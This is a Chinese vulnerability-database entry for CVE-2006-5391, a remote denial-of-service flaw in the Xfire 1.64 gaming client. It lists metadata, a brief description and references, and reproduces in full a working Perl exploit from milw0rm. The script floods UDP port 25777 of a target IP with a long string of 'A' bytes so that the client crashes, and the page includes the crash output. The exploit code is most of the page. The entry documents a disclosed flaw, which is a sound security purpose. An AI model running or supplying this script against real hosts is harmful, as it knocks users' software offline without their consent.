XFire数据包处理拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111307 漏洞类型 设计错误
发布时间 2006-10-16 更新时间 2006-10-20
CVE编号 CVE-2006-5391 CNNVD-ID CNNVD-200610-307
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/2571
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-307
|漏洞详情
Xfire1.64和更早的版本允许远程攻击者通过UDP端口25777的较长字符串来引起拒绝服务(客户端应用程序崩溃)攻击。
|漏洞EXP
#!/usr/bin/perl
#Moderator of http://igniteds.net
##############################################################################
#X fire version:new Release 1.64 <12th, 2006>
##############################################################################
#Vendors web site http://www.xfire.com/
#remote exploit coded by: n00b..
#Credit's to n00b for finding this bug..
#Xfire client has a dos exploit closing the client upon
#success full exploitation xfire will fail..Ive provided the following
#Proof of concept for the exploit..This exploit happens when a malicious
#packet is sent to the client on port udp port 25777 this will throw an exception
#causing xfire to terminate.Tested on win xp service pack 1 + 2.
#this is an example of the error on success full exploitation on the client side.
#################################################################################
#
#          Error microsoft visual c++ runtime library
#
#          program: c:\program files\xfire\xfire.exe
#
#          r6025
#                  - pure virtual function call.
#################################################################################
#Debugging info available at crash time.
#
# eax=77c280e4 ebx=00000000 ecx=77c112b0 edx=77c61a70 esi=7c90e88e edi=000000ff
# eip=7c90eb94 esp=0012f5dc ebp=0012f6d8 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
# ntdll!KiFastSystemCallRet:
# 7c90eb94 c3              ret
#################################################################################
#the following is the proof of concept available..
 
print " 0day Xfire remote dos exploit coded by n00b Release 1.64 <12th, 2006> \n";
 
use IO::Socket;
 
$ip = $ARGV[0];
 
$payload = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
 

if(!$ip)
{
 
die "remember the ip\n";
 
}
 
$port = '25777';
 
$protocol = 'udp';
 

$socket = IO::Socket::INET->new(PeerAddr=>$ip,
                               PeerPort=>$port,
                               Proto=>$protocol,
                               Timeout=>'1') || die "Make sure service is running on the port\n";
 

print $socket $payload;
 
close($socket);
 
print "client has died h00ha \n";

# milw0rm.com [2006-10-16]
|参考资料

来源:XF
名称:xfire-udp-dos(29602)
链接:http://xforce.iss.net/xforce/xfdb/29602
来源:BID
名称:20548
链接:http://www.securityfocus.com/bid/20548
来源:MILW0RM
名称:2571
链接:http://www.milw0rm.com/exploits/2571
来源:MILW0RM
名称:2571
链接:http://milw0rm.com/exploits/2571